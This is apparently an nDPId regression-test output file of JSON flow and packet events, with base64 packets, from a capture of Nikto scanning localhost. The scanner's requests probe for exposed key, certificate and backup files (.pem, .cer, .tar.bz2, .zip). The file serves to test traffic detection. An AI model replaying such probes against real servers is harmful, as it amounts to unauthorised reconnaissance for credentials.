+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1576420277031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277031,"pkt":"AAAAAAAAAAAAAAAACABFAADASFpAAEAG89t\/AAABfwAAAcNYH5CIKHAy4FE5l4AYAED+tAAAAQEICp1m\/E+dZvxPR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1576420277032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277032,"pkt":"AAAAAAAAAAAAAAAACABFAAC9MI5AAEAGC6t\/AAABfwAAAcNaH5DGiQjnE8I6SoAYAED+sQAAAQEICp1m\/FCdZvxQR0VUIC8wLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1576420277033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277033,"pkt":"AAAAAAAAAAAAAAAACABFAAC9R6NAAEAG9JV\/AAABfwAAAcNcH5BSP3\/MbAOkN4AYAED+sQAAAQEICp1m\/FGdZvxRR0VUIC8wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1576420277034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277034,"pkt":"AAAAAAAAAAAAAAAACABFAADCi6hAAEAGsIt\/AAABfwAAAcNeH5CrCbPNtCCkdYAYAED+tgAAAQEICp1m\/FKdZvxSR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1576420277036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277036,"pkt":"AAAAAAAAAAAAAAAACABFAADCaYNAAEAG0rB\/AAABfwAAAcNgH5BETFHrIT\/7L4AYAED+tgAAAQEICp1m\/FSdZvxUR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1576420277037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277037,"pkt":"AAAAAAAAAAAAAAAACABFAADByHVAAEAGc79\/AAABfwAAAcNiH5AsIfAZ9PZ+lIAYAED+tQAAAQEICp1m\/FWdZvxVR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1576420277040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277040,"pkt":"AAAAAAAAAAAAAAAACABFAADBLYNAAEAGDrJ\/AAABfwAAAcNkH5B8OhXu0\/0OtIAYAED+tQAAAQEICp1m\/FidZvxXR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1576420277041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277041,"pkt":"AAAAAAAAAAAAAAAACABFAADJ0PZAAEAGazZ\/AAABfwAAAcNmH5D3m+iZ0R8Y8oAYAED+vQAAAQEICp1m\/FmdZvxZR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1576420277042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277042,"pkt":"AAAAAAAAAAAAAAAACABFAADJPvJAAEAG\/Tp\/AAABfwAAAcNoH5CMHAadHXRwyoAYAED+vQAAAQEICp1m\/FqdZvxaR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1576420277044,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277044,"pkt":"AAAAAAAAAAAAAAAACABFAADCjwZAAEAGrS1\/AAABfwAAAcNqH5Br7rdq4TxVq4AYAED+tgAAAQEICp1m\/FydZvxcR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
